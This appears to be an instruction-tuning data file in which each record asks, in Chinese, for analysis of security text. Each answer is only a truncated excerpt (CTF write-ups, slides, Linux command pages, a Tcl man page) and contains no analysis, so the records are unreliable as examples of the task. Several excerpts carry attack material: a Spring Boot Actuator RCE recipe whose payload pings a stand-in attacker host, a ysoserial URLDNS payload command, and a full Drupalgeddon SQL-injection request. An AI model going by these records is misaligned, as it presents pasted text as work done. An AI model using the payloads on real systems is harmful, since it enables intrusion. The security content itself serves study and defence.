{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## sharpturn (forensics, 400p, 110 solves) > I think my SATA controller is dying. > > sharpturn.tar.xz-46753a684d909244e7d916cfb5271a95 ### PL Version `for ENG version scroll down` Dostajemy zip z czymś co może być tylko zawartością folderu `.git`. Wypakowywujemy więc sobie z niego dane (zrobiliśmy to za pomocą pythona, import zlib i zlib.decompress, ale po zastanowieniu w sumie wystarczyłby pewnie git checkout ;) ). Po chwili zauważamy że coś się nie zgadza - hash pliku sharp.cpp jest inny niż powinien. Patrzymy więc na rewizje po kolei - [rewizja pierwsza](sharp_v1_efda_efda) ma dobry hash. [Rewizja druga](sharp_v2_354e_8675)... już nie. Napisaliśmy więc [sprytny skrypt w pythonie](flipuj.py), flipujący losowe bity (domyślamy się że o to chodzi, skoro w treści zadania jest coś o umierającym kontrolerze SATA) i próbujący odkryć te które sie nie zgadzają. W ten sposób dochodzimy do [poprawnej wersji rewizji drugiej](sharp_v2_354e_354e). Niestety hash [rewizji trzeciej](sharp_v3_d961_7564) również się nie zgadza, ale poprawiamy i jego naszym bitflipperem i mamy [poprawną rewizję trzecią](sharp_v3_d961_7564). I to samo robimy przy czwartej - [plik ze złym hashem](sharp_v4_f8d0_8096) zamieniamy na [plik z dobrym hashem](sharp_v4_f8d0_f8d0). W tym momencie mamy wszystko czego potrzebujemy - faktoryzujemy sobie jeszcze liczbę jak wymaga program, i idziemy: Part1: Enter flag: flag Part2: Input 31337: 31337 Part3: Watch this: https://www.youtube.com/watch?v=PBwAxmrE194 ok Part4: C.R.E.A.M. Get da _____: money Part5: Input the two prime factors of the number 272031727027. 31357 8675311 flag{3b532e0a187006879d262141e16fa5f05f2e6752} (Warto zauważyć poczucie humoru autorów zadania, gdzie \"enter flag\" wymaga podania dosłownie \"flag\"). Flaga którą otrzymujemy jest przyjmowana przez system, więc jesteśmy kolejne 400 punktów do przodu. ### ENG Version We get a zip file with something that can only be the contents of `.git` directory. We extract the data (we did this with python, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypassing)Android) Password)Manager)Apps) Without)Root Stephan)Huber,)Siegfried)Rasthofer,)Steven)Arzt Fraunhofer SIT 2 Stephan  Mobile)Security)Researcher)at) Fraunhofer)SIT  Enjoys teaching)students)in) Android)(app))hacking  Twitter:)@teamsik Siegfried  Head)of Secure)Software) Engineering)at)Fraunhofer)SIT  Founder of CodeInspect  Web:)www.rasthofer.info  Twitter:)@teamsik Acknowledgements  Benedikt)Hiemenz  Daniel)Hitzel  Daniel)Magin  Joseph)Varghese  Julien)Hachenberger  Max)Kolhagen  Michael)Tröger  Philipp)Roskosch  Wittmann)Andreas 3 4 Wish 5 aim=e1Ioci Ohyoh>wae0 kei7Gae$si bei3coo<Li ooB,iu9AhN Phei0IeHa' uhu;j5ohTi Phi,Phu3di Moo0ooz\"oh we(u,t0Zas quucoo<d2I Pae?gh<ie3 loh;Bah4ei Wa[el~oh9i ooh!ee7Aik AX1aeSh>ai eGah+K5iuM yae$V4leex ohjiu_Hei6 fee'Cho5Oo jahK3Ad+ai oH)eewaec0 KiG&ee4ahy ujohj%ie1J wae,Gei6mu uSh=i2ahng ainai]Le2i Ieb~o5fohF ohN\\ah1gae Dooch\\ei7i ich]a're1U aiToh5cee= eiZ2thaip; ni\"W3oom?i oi(Sh7vie) gu}i8Tohco il@ah@ve9U cie\"tae8Eo Au&S3aigae eir0ieHo)c ohch/ah6Ii Bie*t9xie\" ukieTh6fu[ ie*vieZai9 ohwu(v0eeY ua&ghi7aeR em?ohG?oi3 phu$Lah4p ieX&i2shei aiZie%l7Oo ood8Pe<emo faiGh[ie0i OPho9sie>n phie9Ib(ie beiMei[r7a Nagh(aid0U AhTee:tah5 oY\"a5pheib ohthe1Na.e eria9Ahn>u eid8Ohso!o Uv4ia6Gu`o Aeli1li$i& Tothai8ph Euso6eu$ja vie8Ieh?ai leec4aeZ/o Eele+ph2na yai=b!a5Oo Wefoh&m4oh Vo-oX9ka0v ei9eenuN<a Eit}ae4ohF heRie.J6Bo OoZ-ue9mai zait8coo]N yoh9Oopoh$ xoh%C:ahk6 Zi]opu4eiB eGh>ih2oPh noo7Ish'ie Uaz6she|Zu oo0aiP*ee2 coh=Puo1Ve roo9Kee-th ra@c3Ce7sh mabi6Malo[ auw1Eu\\kie eiVoo,Kuu5 aiW\\oo5phu Oos_abir7U Reality 6 Note Password-Manager Password-Recycling Browser) Password-Manager 7 App GooglePlay Downloads Keeper 10) 50 m Keepsafe 10) 50)m 1Password 1  5)m Dashlane 1) 5)m Lastpass 1) 5)m Avast 0.5) 1)m MyPasswords 0.5) 1)m F-Secure 100) 500 k PasswordManger 50  100)k Security)Requirements 8 Confidentiality Availability Integrity 9  Premium)features)for)free  Resetting)master)password)with)ease  Breaking)C.I.A  Lost)device)scenario  Mitm a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Big Picture: Digital Cinema Technology and Security Mike Renlund Digital Cinema Specialist Film: How its always been done  35mm film is the standard, more than a mile of it for one movie.  IMAX film is 10 times larger than 35mm.  The image hasnt been upgraded much in the more than a century that movies have been playing.  The only real upgrade was from Black and White, to Color. Film Sound and Image DTS Timecode Analog Dolby SRD Sony SDDS Distribution/Security of Film Prints  70 lbs (32 kg) cans with the film inside.  Security measures include:  Codenames for content  Separate shipments  Physical locks on the cans DLP technology  First designed in 1987 By Dr. Larry Hornbeck at Texas Instruments.  It took a long time to make a splash in the Movie market.  The first major release in digital cinema was in 2005. The DLP Chip So how tiny are these mirrors? Even closer! Creating an image (greyscale) DMD Chip Lens Screen And finally, what it really looks like Red DMD Green DMD Blue DMD Lens Light Pipe Prism A couple different DLP projectors Sony SXRD  Silicon Xtal Reflective Display Resolution Digital Cinema Distribution  Multiple methods of delivery  Hard Drive  Network Transfer  Satellite  Interesting facts about content Security in Digital Cinema Step 1: 1. Content is served out from a storage point, to the Media Block 2. The content is encrypted. Content Storage Raid Array Media Block(Decoder) Internal to the same box, or two separate devices  The Show Player decodes the video/audio with the KDM, the audio is passed to the audio processor.  The video is reencrypted with Cinelink II, and sent to the projector. Media Block(Decoder) Up to 16 channels of uncompressed audio Audio Processor Projector Dual Link HDSDI Running Cinelink II Ethernet Cryptography Section Projector Media Block(Decoder)  Sha1 256 key  Secure connection to the Media Block  No open access panels  Sha1 256 key  Correct Date Range  Correct content  No tampering detected Any of these fail, and you ca", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ninfo === Linux下info格式的帮助指令 ## 补充说明 **info命令** 是Linux下info格式的帮助指令 就内容来说info页面比man page编写得要更好更容易理解也更友好但man page使用起来确实要更容易得多一个man page只有一页而info页面几乎总是将它们的内容组织成多个区段称为节点每个区段也可能包含子区段称为子节点理解这个命令的窍门就是不仅要学习如何在单独的Info页面中浏览导航还要学习如何在节点和子节点之间切换可能刚开始会一时很难在info页面的节点之间移动和找到你要的东西真是具有讽刺意味原本以为对于新手来说某个东西比man命令会更好些但实际上学习和使用起来更困难 ### 语法 ```shell info(选项)(参数) ``` ### 选项 ```shell -d添加包含info格式帮助文档的目录 -f指定要读取的info格式的帮助文档 -n指定首先访问的info帮助文件的节点 -o输出被选择的节点内容到指定文件 ``` ### 参数 帮助主题指定需要获得帮助的主题可以是指令函数以及配置文件 ### 实例 在info后面输入命令的名称就可以查看该命令的info帮助文档了 ```shell info info ``` 面介绍一下它的几个常用快捷键 ```shell **?键** 它就会显示info的常用快捷键 **N键** 显示相对于本节点的下一节点的文档内容 **P键** 显示相对于本节点的前一节点的文档内容 **U键** 进入当前命令所在的主题 **M键** 敲M键后输入命令的名称就可以查看该命令的帮助文档了 **G键** 敲G键后输入主题名称进入该主题 **L键** 回到上一个访问的页面 **SPACE键** 向前滚动一页 **BACKUP或DEL键** 向后滚动一页 **Q** 退出info ``` **命令** ```shell **** 显示帮助窗口 在帮助窗口中 **Ctrl-x 0** 关闭帮助窗口 **Ctrl-x Ctrl-c** 关闭整个 Info **q** 退出 info **n** 打开与本 Node 关联的下一个 Node **p** 打开与本 Node 关联的前一个 Node **u** 打开与本 Node 关联的上一个 Node **l** 回到上一次访问的 Node **m或g** 选择一个菜单项Node 的名字 输入指定菜单的名字后按回车打开指定菜单项关联的 Node **空格键** 下一页PageDown 也可以下一页从当前页的最后两行开始算起 下一个 Node 若当前页在 Node 文档的末尾 **Del 键** 上一页PageUp 也可以上一页从当前页的开始两行开始算起 上一个 Node 若当前页 Node 文档的开始 **b 或 t 或 Home** 文档的开始b 是 begining 的意思 **e 或 End** 文档的末尾b 是 ending 的意思 **Ctrl-l** 刷新当前页若当前文档显示情况有问题时 **Ctrl-g** 取消所键入的指令 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nURLDNS ysoserial 首先是关于ysoserial项目牛逼就完事了 序列化的过程 1. 首先使用 ysoserial 生成反序列化文件然后自行编写反序列流程触发构造链 踩坑不要使用powershell生成反序列化过程中会报错 2. 反序列化 bin 文件触发 gadget  3. 触发请求 4. 然后查看urldns中gadget的生成过程ysoserial入口文件位于 ysoserial.GeneratePayload  URLDNS文件 ysoserial.payloads.URLDNS java -jar ysoserial-master-d367e379d9-1.jar URLDNS \"http://0hymwn.dnslog.cn\" > urldns.bin public Object getObject(final String url) throws Exception { //Avoid DNS resolution during payload creation //Since the field <code>java.net.URL.handler</code> is transient, it will not be part of the serialized payload. URLStreamHandler handler = new SilentURLStreamHandler(); HashMap ht = new HashMap(); // HashMap that will contain the URL URL u = new URL(null, url, handler); // URL to use as the Key 5. 首先创建一个 SilentURLStreamHandler 对象且 SilentURLStreamHandler 继承自 URLStreamHandler 类然后重写了 openConnection 和 getHostAddress 两个方法这一步的作 用留待后面进一步讲解此处还有一个关于反序列化的知识点 6. 接着创建一个 hashmap 用于之后存储 7. 创建一个 URL 对象此处需要跟进 URL 类查看类初始化会发生啥传递三个参数 (null,url,handler) ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup. Reflections.setFieldValue(u, \"hashCode\", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered. return ht; } public static void main(final String[] args) throws Exception { PayloadRunner.run(URLDNS.class, args); } /** * <p>This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance. * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior * using the serialized object.</p> * * <b>Potential false negative:</b> * <p>If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the * second resolution.</p> */ static class SilentURLStreamHandler extends URLStreamHandler { protected URLConnection openConnection(URL u) throws IOException { return null; }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nlastb === 列出登入系统失败的用户相关信息 ## 补充说明 **lastb命令** 用于显示用户错误的登录列表此指令可以发现系统的登录异常单独执行lastb命令它会读取位于`/var/log`目录下名称为btmp的文件并把该文件内容记录的登入失败的用户名单全部显示出来 ### 语法 ```shell lastb(选项)(参数) ``` ### 选项 ```shell -a把从何处登入系统的主机名称或ip地址显示在最后一行 -d将IP地址转换成主机名称 -f<记录文件>指定记录文件 -n<显示列数>或-<显示列数>设置列出名单的显示列数 -R不显示登入系统的主机名称或IP地址 -x显示系统关机重新开机以及执行等级的改变等信息 ``` ### 参数 * 用户名显示中的用户的登录列表 * 终端显示从指定终端的登录列表 ### 实例 首次运行lastb命令会报下的错误 ```shell lastb: /var/log/btmp: No such file or directory Perhaps this file was removed by the operator to prevent logging lastb info. ``` 只需建立这个不存在的文件即可 ```shell touch /var/log/btmp ``` 使用ssh的登录失败不会记录在btmp文件中 ```shell lastb | head root ssh:notty 110.84.129.3 Tue Dec 17 06:19 - 06:19 (00:00) root ssh:notty 110.84.129.3 Tue Dec 17 04:05 - 04:05 (00:00) root ssh:notty 110.84.129.3 Tue Dec 17 01:52 - 01:52 (00:00) root ssh:notty 110.84.129.3 Mon Dec 16 23:38 - 23:38 (00:00) leonob ssh:notty 222.211.85.18 Mon Dec 16 22:18 - 22:18 (00:00) leonob ssh:notty 222.211.85.18 Mon Dec 16 22:18 - 22:18 (00:00) root ssh:notty 110.84.129.3 Mon Dec 16 21:25 - 21:25 (00:00) root ssh:notty 110.84.129.3 Mon Dec 16 19:12 - 19:12 (00:00) root ssh:notty 110.84.129.3 Mon Dec 16 17:00 - 17:00 (00:00) admin ssh:notty 129.171.193.99 Mon Dec 16 16:52 - 16:52 (00:00) ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAsia-Pacific Cybersecurity Community Collaboration and Joint Defense Tom Millar, US Cybersecurity and Infrastructure Security Agency (CISA) 1. A Little Bit About CISA 2. The Top Threat to US Critical Infrastructure 3. Fighting The Top Threat 4. Working Collaboratively 5. Questions & Answers What is CISA?  CISA is the Nations Risk Advisor  Not a Cyber Regulator  Not a Law Enforcement Agency  Our stakeholders include US Federal Government agencies and US Critical Infrastructure The #1 Threat To Critical Infrastructure  is Ransomware.  Ransomware is intentionally disruptive.  Recovery to full operations can take weeks (whether the victim pays the ransom or not).  Recent severe incidents have affected the energy sector, food and agriculture supply chain, and hospital networks.  Attacks occur daily across all sectors. Defeating Ransomware Together CISA works together with its sister agencies and with private sector partners to combat the ransomware threat.  Law Enforcement Agencies and the Treasury Department disrupt operations and their payment schemes.  Defense, Law Enforcement, Diplomatic and Intelligence Agencies work to take the fight to the enemy.  CISA leads the effort to harden targets  making systems more secure and resilient. Global Collaboration Critical infrastructure is global and international collaboration is key to succeeding against this threat.  International partnerships have helped alert potential victims and minimizing impact.  Sharing timely alerts and detection methods is critical.  This is done via various trust communities using different channels, from formal Information Sharing and Analysis Centers (ISACs) to volunteer groups. Thank You!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Insecure Management Interface ## Springboot-Actuator Actuator endpoints let you monitor and interact with your application. Spring Boot includes a number of built-in endpoints and lets you add your own. For example, the `/health` endpoint provides basic application health information. Some of them contains sensitive info such as : - `/trace` - Displays trace information (by default the last 100 HTTP requests with headers). - `/env` - Displays the current environment properties (from Springs ConfigurableEnvironment). - `/heapdump` - Builds and returns a heap dump from the JVM used by our application. - `/dump` - Displays a dump of threads (including a stack trace). - `/logfile` - Outputs the contents of the log file. - `/mappings` - Shows all of the MVC controller mappings. These endpoints are enabled by default in Springboot 1.X. Note: Sensitive endpoints will require a username/password when they are accessed over HTTP. Since Springboot 2.X only `/health` and `/info` are enabled by default. ### Remote Code Execution via `/env` Spring is able to load external configurations in the YAML format. The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks. In other words, an attacker can gain remote code execution by loading a malicious config file. #### Steps 1. Generate a payload of SnakeYAML deserialization gadget. - Build malicious jar ```bash git clone https://github.com/artsploit/yaml-payload.git cd yaml-payload # Edit the payload before executing the last commands (see below) javac src/artsploit/AwesomeScriptEngineFactory.java jar -cvf yaml-payload.jar -C src/ . ``` - Edit src/artsploit/AwesomeScriptEngineFactory.java ```java public AwesomeScriptEngineFactory() { try { Runtime.getRuntime().exec(\"ping rce.poc.attacker.example\"); // COMMAND HERE } catch (IOException e) { e.printStackTrace(); } } ``` - Create a malicious yaml config (yaml-payload.yml) ```yaml !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# DNS > 注 : 笔记中拓扑图 drawio 源文件在其图片目录下 --- ## 什么是 DNS DNS(Domain Name System域名管理系统) 是因特网的重要基础它建立在一个分布式数据库基础之上在这个数据库里保存了 IP 地址和域名的相互映射关系 **常用的DNS记录** - A ip 地址记录记录域名对应的 ip 地址 - AAAA ipv6 地址记录记录域名对应的 ipv6 地址 - CNAME 别名记录记录一个主机的别名 - MX 邮件交换记录记录一个邮件域名对应的 ip 地址 - NS 域名服务器记录记录该域名由哪台域名服务器解析 - PTR 反向记录即从 ip 地址到域名的一条记录 - TXT 记录域名的相关文本信息 --- ## CAA 记录 **相关文章** - [证书颁发机构授权CAA](https://letsencrypt.org/zh-cn/docs/caa/) **支持设置 CAA 记录的 DNS 提供商列表** - https://sslmate.com/caa/support **辅助工具** - [CAA 记录生成器](https://sslmate.com/caa/) **什么是 CAA 记录?** CAA是一种 DNS 记录它允许站点所有者指定允许哪些证书颁发机构CA颁发包含其域名的证书 该记录在 2013 年由 RFC 6844标准化以允许 CA 降低意外颁发证书的风险默认情况下每个公共 CA 在验证申请者的域名控制权后可以为任何在公共 DNS 中的域名颁发证书 这意味着如果某个 CA 的验证流程出现错误所有域名都有可能受到影响 CAA 记录为域名持有者提供了降低这类风险的方法 **放置 CAA 记录的位置** 可以在主域名或任何深度的子域名上设置 CAA 记录 例如如果你有 `www.community.example.com` 这个域名你可以在该域名`community.example.com` 或 `example.com` 上设置 CAA 记录 CA 将从左到右检查每个版本并在看到任何 CAA 记录后立即停止 因此`community.example.com` 上的 CAA 记录优先于 `example.com` 上的记录 大多数添加 CAA 记录的人都希望将它们添加到注册域名`example.com`这样它们对所有子域名均有效 此外请注意子域名的 CAA 记录优先于其父域名无论该记录相比于主域更宽松或更具限制性 因此子域名可以放松父域名所施加的限制 与所有其他 DNS 请求一样CAA 验证遵循 CNAME 记录 如果 `www.community.example.com` 被设置为 `web1.example.net` 的 CNAMECA 将首先请求 `www.community.example.com` 的 CAA 记录然后发现该域名有一个 CNAME 而不是 CAA 记录后将请求 `web1.example.net` 的 CAA 记录 请注意如果域名具有 CNAME 记录则根据 DNS 标准它不能拥有任何其他记录 --- ## DNS安全 **相关文章** - [DNS 安全 | Cloudflare](https://www.cloudflare.com/zh-cn/learning/dns/dns-security/) **什么是 DNSSEC** 与许多 Internet 协议一样在设计 DNS 系统时并未考虑安全性并且该系统存在一些设计限制再加上技术进步这些限制使攻击者很容易出于恶意劫持 DNS 查找例如将用户发送到可分发恶意软件或收集个人信息的欺诈性网站DNS 安全扩展 (DNSSEC) 是为缓解此问题而创建的安全协议DNSSEC 通过对数据进行数字签名来防止攻击以帮助确保其有效性为确保进行安全查找此签名必须在 DNS 查找过程的每个级别进行 此签名过程类似于人们用笔签署法律文件此人签署别人无法创建的唯一签名并且法院专家能够查看该签名并验证文件是否由该人签署的这些数字签名可确保数据未被篡改 DNSSEC 在 DNS 的所有层中实施分层数字签名策略例如在 `google.com` 查找中根 DNS 服务器将为 `.COM` 域名服务器签写一个密钥然后 `.COM` 域名服务器将为 `google.com` 的权威性域名服务器签写一个密钥 尽管更高的安全性始终是首选的但 DNSSEC 旨在向后兼容以确保传统 DNS 查找仍可正确解析尽管这没有提高安全性作为整体 Internet 安全策略的一部分DNSSEC 应与其他安全措施配合使用例如 SSL/TLS DNSSEC 创建了一个父子信任链该链一直行进到根区域在 DNS 的任何层上此信任链都不能受损否则请", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 <Change information classification in footer>  Nokia 2016 Bell Labs Bell Labs 4G - Who is paying your cellular phone bill? Silke Holtmanns Isha Singh Nokia Bell Labs 2 <Change information classification in footer>  Nokia 2016 Bell Labs Bell Labs Industrial Security Research? 3 Bell Labs  Theoretical studies go into attack and countermeasure design  Validation and awareness of our research by GSMA standards input and publication  Customer feedback and test results allow us to fine-tune and optimize our countermeasures  Research input will fit product needs and operators requests  Operator needs can be discovered live for new research challenges and disruptive new solutions Nokia Bell Labs  Future Attacks and Mitigation Research that solves real problems together with our customers and sometimes even competitors Lab Problem study / Threats/Attack Design Attack Testing Counter measures Validation and Awareness Customer Feedback Product Improvements Bell Labs Research Lifecycle 4 <Change information classification in footer>  Nokia 2016 Bell Labs Bell Labs You connect What does actually happen? 5 Bell Labs Roaming Why should you care? Source: DefCon, National Geographics, Wikipedia You connected to AT&T, Verizon, T-Mobile, Sprint DefCon participants CMCC, Airtel, MegaFon, Telenor My colleagues, friends, family connected to DNA, Elisa, Telia 6 Bell Labs Connecting networks  The hidden private Internet The Interconnection Network (IPX) 7 Bell Labs I switch on my phone Las Vegas Antenna Core Network Carrier / IPX Carrier / IPX Core Network Authentication -> run to home network Checking subscriber 8 <Change information classification in footer>  Nokia 2016 Bell Labs Bell Labs What is this secret network? Where does it come from? 9 Bell Labs <Change information classification in footer>  Nokia 2016 The good auld history 1981  Nordic Operator Meeting Need to call my wife, she has birthday today. Stupid that I can not use my mobile. The sauna is not hot enough. Lets connect ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Crypto (crypto, 136p, 12 solved) In the challenge we get an [encryption code](enc.py) and encrypted flag `a22d0fb9f707b153ab68472082d1f3e977a23f3dc0de469388ec3a56131943eba1873071f7fc01b5fc31b5335056286f5d7634735f35776a74` One we analyse the code we can clearly see the vulnerability -> there are 2 things which are supposed to encrypt the data, subtraction and XOR. However the parameters are created by: ```python a, b, c = (int(key[i:i + 8], 16) for i in range(0, len(key), 8)) ``` The values `b` and `c` are both rotated left as 64 bit values, while they're were in fact created from 8 bits values only. This means very quickly both of them will become `0`. This leaves the subtraction step. We could try to invert the encryption knowing the flag prefix, and recover the parameters one by one. But we're too lazy for that. The operations are really only `+-` and `&`, so we can just ask Z3 to do the work for us. We port the encryption function to make it easier to use from Z3: ```python def encryptx(data, key): encrypted = [] a, b, c = key for d in data: keystream = (b & 0xff)  (c & 0xff) d = (d - (a & 0xff))  keystream d = d & 0xff encrypted.append(d) a = rotr(a) b = rotl(b) c = rotl(c) # print(a, b, c) return encrypted ``` No we can run Z3 on this: ```python def decrypt(ct): key = tuple([BitVec('k%d' % i, 64) for i in range(3)]) flag = [BitVec('x%d' % i, 64) for i in range(len(ct) / 2)] s = Solver() for x in flag: s.add(x > 0, x < 128) s.add(Or(x == 32, x > 32)) result = encryptx(flag, key) for i, x in enumerate(ct.decode(\"hex\")): s.add(result[i] == ord(x)) for i, c in enumerate(\"Congrats! Flag is: \"): s.add(flag[i] == ord(c)) s.check() model = s.model() solution = [model[x].as_long() for x in flag] print(\"\".join(map(chr, solution))) return \"\".join(map(chr, [model[x].as_long() for x in flag])) ``` Initially we didn't know the prefix so we didn't have the `Congrats! Flag is: ` value and the encryption was ambigious, so in the end we looped over this and instructed Z3 to en", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Introduction 我们从隔离访问控制异常检测随机化这四种方式来介绍内核中的防御机制 ## 参考 - https://linuxplumbersconf.org/event/7/contributions/775/attachments/610/1096/Following_the_Linux_Kernel_Defence_Map.pdf - https://github.com/a13xp0p0v/linux-kernel-defence-map - https://outflux.net/slides/2018/lca/kspp.pdf - https://www.kernel.org/doc/html/latest/security/self-protection.html - https://powerofcommunity.net/poc2019/x82.pdf - https://samsung.github.io/kspp-study/infoleak.html", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nClassification: Internal www.nviso.eu .NET reflection for post exploitation tradecraft in an EDR world. Classification: Internal Jean-François Maes Creator of redteamer.tips Host of The voices of infosec podcast Contributor to SANS SEC560 and SEC699 Devourer of chicken and other proteins #RedTeamFit # Whoami Classification: Internal Why give this talk? Because I like donuts Classification: Internal 1 Why C#? 2 What is reflection? 3 Creating a loader 4 Improving the loader 5 Future of tradecraft Classification: Internal Why C# ? As defences grow, so does the malware Since V5 AMSI Constrained Language Mode Nice read: https://stealthbits.com/blog/ways-to-detect-and-mitigate-powershell-attacks/ Classification: Internal Why C# ? As defences grow, so does the malware Script Block Logging Nice read: https://stealthbits.com/blog/ways-to-detect-and-mitigate-powershell-attacks/ Since V5 Classification: Internal Why C# ? As defences grow, so does the malware Shoutout to Nice presentation: https://hackinparis.com/data/slides/2019/talks/HIP2019-Marcello_Salvati-Ironpython_Omfg.pdf Classification: Internal What is reflection? www.nviso.be | 8 Lets see what the internet says Wikipedia In computer science, reflection programming is the ability of a process to examine, introspect, and modify its own structure and behavior. A language supporting reflection provides a number of features available at runtime that would otherwise be difficult to accomplish in a lower-level language. Microsoft Stack Overflow Reflection provides objects that describe assemblies, modules, and types. You can use reflection to dynamically create an instance of a type, bind the type to an existing object, or get the type from an existing object and invoke its methods or access its fields and properties. If you are using attributes in your code, reflection enables you to access them. Reflection allows you to write code that can inspect various aspects about the code itself. It enables you to do simple things l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Drupal < 7.32 Drupalgeddon SQL注入漏洞CVE-2014-3704 Drupal 是一款用量庞大的CMS其7.0~7.31版本中存在一处无需认证的SQL漏洞通过该漏洞攻击者可以执行任意SQL语句插入修改管理员信息甚至执行任意代码 ## 漏洞环境 执行如下命令启动Drupal 7.31环境 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:8080`即可看到Drupal的安装页面使用默认配置安装即可 其中Mysql数据库名填写`drupal`数据库用户名密码为`root`地址为`mysql` ![](1.png) 安装完成后访问首页 ![](2.png) ## 漏洞复现 该漏洞无需认证发送如下数据包即可执行恶意SQL语句 ``` POST /?q=node&destination=node HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 120 pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a ``` 可见信息已被爆出 ![](3.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 黑灰产舆情监控 - 思路一监测黑产市场和群组信息>黑产CDN服务使用动向>监测全网该CDN服务的Passive DNS>CADNSIP关键词的关联分析 ## 论坛网站 黑灰产参与者常活跃的论坛类型有 - 暗网市场论坛 - 各类黑客技术交流网站 - 黑灰产项目网站例如菠*圈[黑产知乎](https://www.zhihu99.com/forum-36-1.html)等 - 华人论坛例如菲*华社区 值得注意的是在进行论坛社交媒体数据采集时我们需要考虑这些论坛的访问使用技术难度结合黑灰产的上中下游分布", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nvgextend === 向卷组中添加物理卷 ## 补充说明 **vgextend命令** 用于动态扩展LVM卷组它通过向卷组中添加物理卷来增加卷组的容量LVM卷组中的物理卷可以在使用vgcreate命令创建卷组时添加也可以使用vgextend命令动态的添加 ### 语法 ```shell vgextend(选项)(参数) ``` ### 选项 ```shell -d调试模式 -t仅测试 ``` ### 参数 * 卷组指定要操作的卷组名称 * 物理卷列表指定要添加到卷组中的物理卷列表 ### 实例 使用vgextend命令向卷组\"vg2000\"中添加物理卷在命令行中输入下面的命令 ```shell [root@localhost ~]# vgextend vg2000 /dev/sdb2 #将物理卷\"/dev/sdb2\"加入卷组\"vg2000\" ``` 输出信息如下 ```shell Volume group \"vg2000\" successfully extended ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993 The Regents of the University of California. '\\\" Copyright (c) 1994-1997 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: uplevel.n,v 1.2 2003/11/24 05:10:00 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbCla", "category": "text_analysis", "source": "security_papers"}
